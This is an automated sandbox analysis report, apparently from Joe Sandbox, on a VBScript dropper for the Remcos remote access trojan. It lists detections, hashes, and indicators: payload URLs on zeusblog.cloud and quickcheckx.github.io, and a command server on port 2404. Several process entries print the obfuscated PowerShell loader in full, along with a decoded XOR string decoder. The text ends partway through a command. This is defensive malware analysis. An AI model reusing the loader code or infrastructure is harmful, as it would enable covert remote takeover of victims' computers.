Windows Analysis Report
002671299.vbs

Overview

General Information

Sample Name: 002671299.vbs
Analysis ID: 875681
MD5: ab9b3d4a26d471f3cab30e7b5fb1ebdd
SHA1: 61b6ede9958ee0ae4a23e8c2f43da4b4c3eee69c
SHA256: 0694f9298292cb06b0eae287f24b53d2ed824c16eec54bf73f775b9e8ad2a337
Tags: RemcosRAT
Infos:

Detection

Remcos
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Sigma detected: Remcos
Antivirus detection for URL or domain
Hides threads from debuggers
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Very long command line found
Obfuscated command line found
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://zeusblog.cloud/Adobe.pdf Avira URL Cloud: Label: malware
Source: unknown HTTPS traffic detected: 104.168.213.196:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.3:49699 version: TLS 1.2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.108.153 185.199.108.153
Source: Joe Sandbox View IP Address: 185.199.108.153 185.199.108.153
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Adobe.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zeusblog.cloudCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /quickme/KmJiw22.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: quickcheckx.github.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /quickme/KmJiw22.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: quickcheckx.github.ioCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49700 -> 51.89.53.37:2404
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: powershell.exe, 00000005.00000003.511248966.000001E7A4ED5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.515865555.000001E78CA41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: unknown DNS traffic detected: queries for: quickcheckx.github.io
Source: global traffic HTTP traffic detected: GET /Adobe.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zeusblog.cloudCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /quickme/KmJiw22.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: quickcheckx.github.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /quickme/KmJiw22.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: quickcheckx.github.ioCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: unknown HTTPS traffic detected: 104.168.213.196:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.3:49699 version: TLS 1.2

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd /c dir&echo ###RSHELL.EXE###
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd /c dir&echo ###RSHELL.EXE### Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD Jump to behavior
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 15201
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7388
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 15201 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7388 Jump to behavior
Yara signature match
Source: amsi64_6952.amsi.csv, type: OTHER Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000002.384103940.000001ECD74B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.378704146.000001ECD74B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000002.383860674.000001ECD7415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000002.384387348.000001ECD9FAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.382603669.000001ECD74B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Source: 00000000.00000003.378581669.000001ECD74B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFBAC0F23AA 5_2_00007FFBAC0F23AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFBAC0F19A3 5_2_00007FFBAC0F19A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFBAC0F0FA2 5_2_00007FFBAC0F0FA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFBAC0F0F1D 5_2_00007FFBAC0F0F1D
Java / VBScript file with very long strings (likely obfuscated code)
Source: 002671299.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\002671299.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd /c dir&echo ###RSHELL.EXE###
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Incl11 { param([String]$Wavel); $Lingvi = ''; Write-Host $Lingvi; Write-Host $Lingvi; Write-Host $Lingvi; $Unrefut = New-Object byte[] ($Wavel.Length / 2); For($Foreffel=0; $Foreffel -lt $Wavel.Length; $Foreffel+=2){ $Kommando = $Wavel.Substring($Foreffel, 2); $Unrefut[$Foreffel/2] = [convert]::ToByte($Kommando, 16); $Lastendes160 = ($Unrefut[$Foreffel/2] -bxor 105); $Unrefut[$Foreffel/2] = $Lastendes160; } [String][System.Text.Encoding]::ASCII.GetString($Unrefut);}$Matema0=Incl11 '3A101A1D0C04470D0505';$Matema1=Incl11 '24000A1B061A060F1D473E00075A5B473C071A080F0C27081D001F0C240C1D01060D1A';$Matema2=Incl11 '2E0C1D391B060A280D0D1B0C1A1A';$Matema3=Incl11 '3A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F';$Matema4=Incl11 '1A1D1B00070E';$Matema5=Incl11 '2E0C1D24060D1C050C2108070D050C';$Matema6=Incl11 '3B3D3A190C0A0008052708040C454921000D0C2B103A000E4549391C0B05000A';$Matema7=Incl11 '3B1C071D00040C4549240807080E0C0D';$Matema8=Incl11 '3B0C0F050C0A1D0C0D2D0C050C0E081D0C';$Matema9=Incl11 '2007240C04061B1024060D1C050C';$ehrl0=Incl11 '24102D0C050C0E081D0C3D10190C';$ehrl1=Incl11 '2A05081A1A4549391C0B05000A45493A0C08050C0D454928071A002A05081A1A4549281C1D062A05081A1A';$ehrl2=Incl11 '20071F06020C';$ehrl3=Incl11 '391C0B05000A454921000D0C2B103A000E4549270C1E3A05061D45493F001B1D1C0805';$ehrl4=Incl11 '3F001B1D1C0805280505060A';$ehrl5=Incl11 '071D0D0505';$ehrl6=Incl11 '271D391B061D0C0A1D3F001B1D1C0805240C04061B10';$ehrl7=Incl11 '202C31';$ehrl8=Incl11 '35';$Soro=Incl11 '3C3A2C3B5A5B';$Imman=Incl11 '2A0805053E00070D061E391B060A28';function fkp {Param ($Roman, $Makaronie) ;$Trothed0 =Incl11 '4D2F0C1B0449544941322819192D06040800073453532A1C1B1B0C071D2D0604080007472E0C1D281A1A0C040B05000C1A41404915493E010C1B0C44260B030C0A1D4912494D36472E05060B0805281A1A0C040B05102A080A010C494428070D494D364725060A081D000607473A1905001D414D0C011B05514032445834472C181C08051A414D24081D0C04085940491440472E0C1D3D10190C414D24081D0C04085840';.($ehrl7) $Trothed0;$Trothed5 = Incl11 '4D240005004954494D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085B4549323D10190C3234344929414D24081D0C04085A45494D24081D0C04085D4040';.($ehrl7) $Trothed5;$Trothed1 = Incl11 